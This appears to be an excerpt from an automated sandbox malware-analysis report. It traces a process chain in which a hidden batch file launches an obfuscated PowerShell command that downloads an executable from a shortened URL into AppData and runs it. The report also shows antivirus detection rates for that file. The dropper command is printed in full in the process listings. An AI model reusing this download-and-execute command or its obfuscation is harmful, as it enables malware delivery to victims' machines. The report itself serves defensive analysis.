                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\attrib.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\system32\attrib.exe' +s +h pd.bat
                                                        Imagebase:0xff680000
                                                        File size:18432 bytes
                                                        MD5 hash:C65C20C89A255517F11DD18B056CADB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:10
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:11
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\mode.com
                                                        Wow64 process (32bit):false
                                                        Commandline:mode 18,1
                                                        Imagebase:0xffea0000
                                                        File size:30208 bytes
                                                        MD5 hash:718E86CB060170430D4EF70EE39F93D4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:11
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ver
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:12
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:09:06:13
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        General

                                                        Start time:09:06:19
                                                        Start date:08/01/2021
                                                        Path:C:\Users\user\AppData\Roaming\cr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\AppData\Roaming\cr.exe'
                                                        Imagebase:0x400000
                                                        File size:565248 bytes
                                                        MD5 hash:740E559929463320CB8E0403FD35A097
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 72%, ReversingLabs

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >